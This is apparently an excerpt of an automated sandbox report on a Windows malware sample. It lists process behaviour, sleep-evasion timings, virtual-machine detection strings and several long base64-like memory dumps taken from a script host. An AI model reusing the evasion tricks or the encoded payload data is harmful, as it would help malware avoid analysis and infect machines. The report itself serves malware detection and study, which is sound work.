                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2706Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3525Jump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeWindow / User API: threadDelayed 9839Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI coverage: 0.8 %
                Source: C:\Windows\SysWOW64\runonce.exeAPI coverage: 3.1 %
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4144Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1260Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe TID: 5408Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exe TID: 6932Thread sleep time: -266000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exe TID: 6932Thread sleep time: -19678000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe TID: 3636Thread sleep time: -35000s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\runonce.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 9_2_0261C8D0 FindFirstFileW,FindNextFileW,FindClose,9_2_0261C8D0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: wscript.exe, 00000000.00000003.1800139870.00000231391B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
                Source: wscript.exe, 00000000.00000003.1800139870.00000231391B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
                Source: wscript.exe, 00000000.00000003.1800096166.00000231392B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
                Source: wscript.exe, 00000000.00000002.1801873166.00000231390FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: powershell.exe, 00000001.00000002.1787272397.000001CFE30F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
                Source: wscript.exe, 00000000.00000002.1801585342.00000231369F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1798831358.00000231369F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                Source: wscript.exe, 00000000.00000003.1800139870.00000231391B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
                Source: wscript.exe, 00000000.00000002.1801873166.00000231390EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1801585342.00000231369F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1798831358.00000231369F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: wscript.exe, 00000000.00000003.1800096166.00000231392B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
                Source: firefox.exe, 0000000B.00000002.2506862622.000002B1F9F1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllUU[
                Source: runonce.exe, 00000009.00000002.2974317535.00000000026EB000.00000004.00000020.00020000.00000000.sdmp, xBjKgBCuI1jq.exe, 0000000A.00000002.2974921964.0000000000F09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: wscript.exe, 00000000.00000003.1800139870.00000231391B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PYX2cZ4xzJJjcS7A5684VuJ/f1TVjF3sUumkuzHq8QR5v4L8tTkZk+0jKHNqfoHH8D4iivIIYfYxZuWCM+FP9v+fWeeoWESDHRsyrFpppgEgDdWZe2E84u2XW0CxcpJDxZvOjca55Ndl6+/93/5SnwIqa21sAQjfudbWkCehGyCY/bMRetbTYYUdKLYvqDPAFZMZsErwyMJxEmHppPmr4rTHugKJcZ9XAY8A3psg04rhU/Kfrwi0R8VhRMPY19YmcgPaXsxoOQc0zOJhUDw9zDMgSoFyPnKeTRxeyCcvv+Ju0xCN/420M+GdWCxkT3AOIo0NTxSE34HAcrn/RWMXIjYdaeJWRI4Gxyflo58/LUw9RLSCzpGG16BP0GL6GvC800bc8hoIas5ICZBfxsWrRn+NsQcRc9z15c+Rd/f3P7in/KEL34FeIuyyKd2E5glBbv4Ye9lB1C/H12Lbxk9Obb7dSHyFqFhsruXwxVuwLdGs8zu1y/rOY8NSZA7lFBXSDUI90pSdmb6yf5jeTtIwJ9+hakD8SQgKKRMvBFf4x4okRLCplY96PWtQ3krXMT4t7yBqfVMw+knNZQLWfqo8HAoSnlOh919MH5Q/CjRWEAStsjQ+x9LShj5fcDxteFnic5FSjadjOu2HiJ9y8xPgryyuHQwrtmHuVGqB8Qd05OU6hIfwIihVYfsVJy/w88PRIikZQDx7X4uMBxPy827xuiS8EgxJYGpTiC4SDDr2NWzWATXi2hvAwBe446xpnuB304TmZ1JA7eqR7nLKu9gQy1Jr9qAQwQEjxYsyBcXKP8S9Lys6vYiAviNwk8UnPBPBihjiLfk1RImUTFvuZkhrY6pje6dAZZqRvT98ZPBq1XRAtsO5FEc5SyZ8JFIyU81QJHaKQdXsAzEozS5KQDZKlGEqLlwsLEiUXVVjVKvCNcUvCertwZljGe+88UHUs4zgXvCZ5O9BvapWl8TCCzSImgHPL/ODDNCTCJz57WOfDf+MmIsxbcNDsOfLBZ4gduJ5DGI+MIN6SLXyeAKI6/8JFtOWFb6HE7SpcSW5JvEFatKobn6+6Y+GFoJhnBMX8QHKE8OoA988OVZp/wLnNudZuvzBT0C9cPmlbtRzfVhaX+A+Wb5DjjIjSdDjs/UlTJqBury4ueL52leMixbIRWzZzdcLPSgoFKYV0Xv772N5/aGQyXQgspAKIvKUEzHMzwwrPxKPwrJJ2Sdq+7FmA2G1pI2JagP648wYK9a8mpUq//4joYxHm7dG8aKzoMaztSNwErKEgSnD7ywWUDXXoai+eAdwjUo4UGERzkRyy0b4DqKS5kDQGMlxfxO8oAqpxx8i2diM1pmwCU7P1HzzFPJ